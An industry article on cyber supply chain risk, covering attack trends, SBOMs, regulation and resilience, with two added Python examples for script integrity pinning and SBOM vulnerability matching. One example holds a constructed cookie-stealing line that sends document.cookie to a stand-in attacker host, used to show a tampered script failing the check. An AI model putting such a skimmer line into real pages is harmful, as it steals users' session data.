Supply chain in the digital age: Risks, regulations, and resilience

Despite the critical role of supply chain security, its intricacies often remain hidden. So what should organisations do?

As threat actors shift their focus from direct attacks on organisations to targeting supply chains, the need to prioritise cyber supply chain risk management has never been greater. These attacks pose a significant challenge, compromising trusted parts of the technology ecosystem and potentially affecting multiple organisations through a single compromised link in the chain.

Often, we find lesser-resourced small and medium enterprises downstream in the cyber supply chain. These organisations may not have the same capacity and competencies needed to defend against cyber-attacks. By exploiting weaknesses in these vendors and suppliers, attackers gain access to infiltrate and disrupt larger entities, making these smaller entities in a supply chain prominent targets.

Despite the critical role of supply chain security, its intricacies often remain hidden. Consider this: you order a product online, and like clockwork, it arrives at your doorstep within days. Behind this seemingly seamless process lies a complex network of suppliers, manufacturers, distributors, retailers, and logistics service providers – the supply chain. Now, add a layer of cybersecurity to this intricate web, and you have the cyber supply chain.

But why should we care about securing this invisible lifeline? The answer lies in the impact it has on businesses, consumers, and the global economy.

The numbers tell a story too. Between 2019 and 2022, there was a substantial increase in the number of software packages affected by cyber supply chain attacks globally, rising from 702 to 185,572. Data reveals that between January and March 2023 alone, the number of software packages impacted by such cyber-attacks reached 17,150.

In 2022, approximately 11 million customers were affected by supply chain cyber-attacks globally. In the first quarter of 2023 alone, over 60,000 customers reported impacts from such attacks, with counterfeiting, drive-by compromise and malware infection among the most common techniques. Behind these numbers stand well-known incidents in which threat actors exploited weaknesses in widely used products and components: the SolarWinds compromise, the Log4j (Log4Shell) vulnerability, and the more recent waves of attacks on vulnerabilities in Ivanti's VPN products and Cisco's networking products.

This underscores the vital necessity for robust cyber supply chain risk management. Now, let us delve into how we can achieve this.

Vendor, software and hardware dynamics

Cyber supply chain attacks often target open-source code or commercially available APIs used by developers, because these reusable components appear in a great many software applications: a single flaw in one of them is inherited by every product that embeds it. Cybercriminals exploit vulnerabilities in these components to gain unauthorised access to systems, steal sensitive data, or spread malicious software.

Many websites rely on code provided by vendors and service providers to enhance their functionality, such as social sharing buttons, advertising frames, payment processing tools, and chatbots. Such third-party scripts run in the browser with the same privileges as the site's own code, so a compromise at the vendor becomes a compromise of every page that loads the script.
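One concrete defence against a tampered vendor script is Subresource Integrity (SRI): the site pins a hash of the script it reviewed, and the browser refuses to run a copy whose hash differs. The Python below is an added example, not code from the article or from any vendor named in it; the two script bodies are constructed for illustration (a harmless widget and the same widget with an appended skimmer line), and the hostnames in them are placeholders.

```python
"""Pin a third-party script with Subresource Integrity (SRI) and show that an
altered copy fails the check. Added example; script bodies are constructed."""
import base64
import hashlib
import hmac

# Constructed sample: the vendor's script as reviewed and approved for embedding.
APPROVED_SCRIPT = b"window.shareWidget = function (u) { /* render share buttons */ };\n"

# Constructed sample: the same script after an attacker appended a data skimmer.
TAMPERED_SCRIPT = APPROVED_SCRIPT + b"fetch('https://attacker.example/c?d=' + document.cookie);\n"

# Algorithms SRI permits, ordered by strength (browsers keep only the strongest
# algorithm present in an integrity attribute when several tokens are listed).
_STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Return the SRI token (e.g. 'sha384-<base64 digest>') for a script body."""
    if algo not in _STRENGTH:
        raise ValueError("SRI permits only sha256, sha384 or sha512")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, body: bytes, algo: str = "sha384") -> str:
    """Build the <script> tag the page should ship. crossorigin="anonymous" is
    required for the browser to enforce SRI on a cross-origin resource."""
    return (f'<script src="{src}" integrity="{sri_hash(body, algo)}" '
            f'crossorigin="anonymous"></script>')


def verify(body: bytes, integrity: str) -> bool:
    """Mimic the browser's check: keep the tokens that use the strongest listed
    algorithm, recompute that digest over the body and accept if any one matches.
    Unlike a browser, which loads the resource when no token is recognised, this
    returns False so that a typo in the attribute is caught during review."""
    tokens = [t for t in integrity.split() if t.split("-", 1)[0] in _STRENGTH]
    if not tokens:
        return False
    algo = max(tokens, key=lambda t: _STRENGTH[t.split("-", 1)[0]]).split("-", 1)[0]
    candidates = [t for t in tokens if t.startswith(algo + "-")]
    actual = sri_hash(body, algo)
    # constant-time comparison avoids leaking how many leading characters matched
    return any(hmac.compare_digest(actual, t) for t in candidates)


if __name__ == "__main__":
    pinned = sri_hash(APPROVED_SCRIPT)
    print(script_tag("https://cdn.vendor.example/share.js", APPROVED_SCRIPT))
    print("approved copy passes:", verify(APPROVED_SCRIPT, pinned))
    print("tampered copy passes:", verify(TAMPERED_SCRIPT, pinned))
```

SRI only helps for resources whose content is fixed at the time the page is published; a vendor script that legitimately changes on every release must be re-reviewed and re-pinned, which is exactly the point of the control. Pair it with a Content-Security-Policy that restricts where scripts may be loaded from and where data may be sent.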

Implementing operational strategies across vendors, software, and hardware is essential for continuously monitoring and mitigating cyber supply chain risks. Additionally, legislation and regulation are needed to ensure accountability and responsibilities across the supply chain. Emerging practices like Software Bills of Materials (SBOMs) and Hardware Bills of Materials (HBOMs) are gaining traction, but they are only the very beginning of a material effort to rein in the risks.

SBOMs and HBOMs are critical because modern enterprises heavily rely on applications that integrate a wide range of components sourced from multiple parties, which cybercriminals often exploit. Without proper inventory and tracking of software and hardware components, organisations remain oblivious to vulnerabilities that may exist in the supply chain. Likewise, being unaware of the vendors in the supply chain might leave an organisation vulnerable when security breaches, compliance issues, and system failures occur at the vendor level, leading to cascading impacts. By maintaining this awareness and developing mitigation strategies within the risk appetite, development teams can better manage and secure their technology stack.
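What an SBOM actually buys an organisation is the ability to answer "are we running an affected version?" the day an advisory lands. The Python below is an added example, not code from the article or from any SBOM tool; it reads a small CycloneDX-style SBOM and matches its components, by package URL, against a list of advisories expressed as version ranges. The SBOM document, the component names and the advisory identifiers (EXAMPLE-...) are all constructed placeholders, not real packages or CVEs; a real run would load the SBOM produced by the build and the advisories from a feed such as OSV or the NVD.

```python
"""Match a CycloneDX-style SBOM against known-vulnerable version ranges.
Added example; the SBOM and advisory list are constructed placeholders."""
import json

# Constructed SBOM: three identified components plus one with no package URL.
SBOM_JSON = """{
  "bomFormat": "CycloneDX",
  "specVersion": "1.5",
  "components": [
    {"type": "library", "name": "log-lib", "version": "2.14.1",
     "purl": "pkg:maven/org.example/log-lib@2.14.1"},
    {"type": "library", "name": "http-client", "version": "4.5.13",
     "purl": "pkg:maven/org.example/http-client@4.5.13?type=jar"},
    {"type": "library", "name": "share-widget", "version": "1.9.0",
     "purl": "pkg:npm/share-widget@1.9.0"},
    {"type": "library", "name": "legacy-blob", "version": "0.1"}
  ]
}"""

# Constructed advisories: affected if introduced <= version < fixed
# (fixed None means no fixed release exists yet). IDs are invented.
ADVISORIES = [
    {"id": "EXAMPLE-2021-0001", "purl_prefix": "pkg:maven/org.example/log-lib",
     "introduced": "2.0.0", "fixed": "2.17.1"},
    {"id": "EXAMPLE-2023-0002", "purl_prefix": "pkg:npm/share-widget",
     "introduced": "1.8.0", "fixed": "1.8.5"},
    {"id": "EXAMPLE-2022-0003", "purl_prefix": "pkg:maven/org.example/http-client",
     "introduced": "5.0.0", "fixed": None},
]


def version_key(v: str) -> tuple:
    """Turn '2.14.1' into (2, 14, 1) for ordering. Non-numeric segments such as
    'rc1' in '1.0.0-rc1' are reduced to their digits; a production tool should
    apply the ecosystem's own rules (semver, Maven, PEP 440) instead."""
    parts = []
    for seg in v.replace("-", ".").split("."):
        digits = "".join(ch for ch in seg if ch.isdigit())
        parts.append(int(digits) if digits else 0)
    return tuple(parts)


def is_affected(version: str, introduced: str, fixed) -> bool:
    """Half-open range check: introduced <= version < fixed."""
    v = version_key(version)
    if v < version_key(introduced):
        return False
    return fixed is None or v < version_key(fixed)


def split_purl(purl: str):
    """'pkg:npm/share-widget@1.9.0' -> ('pkg:npm/share-widget', '1.9.0').
    Qualifiers (?type=jar) and subpaths (#...) are dropped before splitting."""
    core = purl.split("?", 1)[0].split("#", 1)[0]
    if "@" not in core:
        return core, None
    prefix, ver = core.rsplit("@", 1)
    return prefix, ver


def find_affected(sbom_text: str, advisories):
    """Return (affected, unidentified): affected components with their advisory,
    and component names that carry no package URL and so cannot be matched.
    The second list is the SBOM quality signal: an unidentifiable component is
    a blind spot, not a clean result."""
    sbom = json.loads(sbom_text)
    affected, unidentified = [], []
    for comp in sbom.get("components", []):
        purl = comp.get("purl")
        if not purl:
            unidentified.append(comp.get("name", "<unnamed>"))
            continue
        prefix, version = split_purl(purl)
        version = version or comp.get("version")
        if not version:
            unidentified.append(comp.get("name", prefix))
            continue
        for adv in advisories:
            if adv["purl_prefix"] == prefix and is_affected(version, adv["introduced"], adv["fixed"]):
                affected.append({"name": comp.get("name", prefix), "version": version,
                                 "advisory": adv["id"], "fixed": adv["fixed"]})
    return affected, unidentified


if __name__ == "__main__":
    hits, blind_spots = find_affected(SBOM_JSON, ADVISORIES)
    for h in hits:
        print(f"{h['name']} {h['version']} affected by {h['advisory']}; fixed in {h['fixed']}")
    print("unidentifiable components:", blind_spots)
```

On the constructed input only log-lib 2.14.1 falls inside an advisory range, while share-widget 1.9.0 is already past its fix and http-client 4.5.13 is below the introduced version. The component without a package URL is reported separately rather than silently passed, because an SBOM entry that cannot be matched to any advisory feed gives no assurance at all.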

With the fast-paced development of technology, embedding cybersecurity upstream is also important. For example, integrating cyber-aware procurement practices with DevSecOps embeds security considerations across the entire supply chain lifecycle, from procurement through deployment to disposal. This helps identify and mitigate security risks early in the development phase and enforces controls throughout the lifecycle.

Minimising risks: Norms and regulations

In today’s digital landscape, protecting sensitive data goes beyond good practice—it’s a legal necessity. Regulations like the General Data Protection Regulation (GDPR) in the EU, the Health Insurance Portability and Accountability Act (HIPAA) in the US, and the Personal Data Protection Act (PDPA) in Singapore offer vital guidelines for safeguarding personal and medical information. Compliance is not just about avoiding penalties; it is about building trust with customers, patients, and stakeholders.

In Asia, cybersecurity norms, established at the United Nations (UN), are advocated by regional initiatives like the Asean Cybersecurity Cooperation Strategy. Countries such as Japan, South Korea, and Singapore have developed robust national strategies that adhere to both global standards and local requirements. They all focus on leveraging public-private partnerships and supporting cybersecurity innovation.

Collaboration efforts in Asean and Singapore with UN and INTERPOL have helped to synchronise regional and global cybersecurity practices. A distinctive feature in Asia is the emphasis on cyber sovereignty, where global norms are adapted to suit local contexts. Substantial investments in cybersecurity infrastructure and capacity building are being made to address regional threats and challenges.

In Singapore, the government-led Counter Ransomware Task Force is actively addressing cyber-attacks that result from ransomware infections, a critical concern for businesses. Notably, it has led to the establishment of guidelines on ransom payment and has recommended comprehensive strategies, plans, and capabilities for effectively countering ransomware threats.

Singapore has also aligned itself with, and committed to continuing the implementation of, the cyber norms established by the United Nations, which includes developing a checklist of steps for countries to adopt cybersecurity guidelines, all with the aim of making the use of information and communications technology (ICT) products safer. Singapore's Ambassador and Permanent Representative to the United Nations in New York, Mr. Burhan Gafoor, also serves as the Chairperson of the Open-Ended Working Group (OEWG), contributing to the spread and implementation of cyber norms globally.

While the Geneva Dialogue on Responsible Behaviour in Cyberspace has made strides in bringing cyber supply chain risk management to the forefront of international discourse, measuring its direct impact on cyber defence is challenging. The Geneva Manual suggests actions to help the different stakeholders in the ecosystem understand what they can viably implement, and the dialogue itself serves as an avenue for building further consensus.

In addition to these initiatives, there is a growing global consensus on cyber norms, evident in agreements like the Paris Call for Trust and Security in Cyberspace and the Budapest Convention on Cybercrime. While these efforts establish a framework of expected behaviours, actual implementation varies across countries due to differing national interests and cybersecurity capabilities.

Steps towards cyber resilience

Recognising the multifaceted nature of the cybersecurity challenge we face, governments worldwide are taking measures to bolster cybersecurity compliance, particularly in critical infrastructure sectors. As various countries introduce or consider legislation mandating cybersecurity standards, the path forward will progressively become clearer.

Implementing universal cybersecurity standards, encouraging research and development, and fostering public-private partnerships are key. Education and training initiatives to build a skilled cybersecurity workforce are also essential. Finally, developing an international legal framework to address cybercrimes and encourage responsible state behaviour in cyberspace could significantly strengthen cyber supply chain security.

Simultaneously, the private sector must take proactive measures. This includes understanding their digital attack surface, which encompasses the cyber supply chain, and architecting their technology so that protective and defensive controls are built in rather than bolted on.

Additionally, organisations should conduct regular cybersecurity risk assessments and audits to evaluate governance capabilities. This involves engaging in threat hunting, technical security tests and red team exercises to validate their defensive processes.

Simulation exercises such as tabletop exercises and wargames should also be performed to assess the organisations’ ability to manage incidents and crises. It will also bode well for organisations to participate in information sharing and intelligence sharing to improve their awareness, enable early warning and identify opportunities for proactive defensive actions.

Addressing potential threats within the cyber supply chain is an ongoing effort that cannot be resolved overnight, but with consistent vigilance and strategic planning, solutions can be achieved.

Teo Xiang Zheng is the vice president of Advisory, Ensign InfoSecurity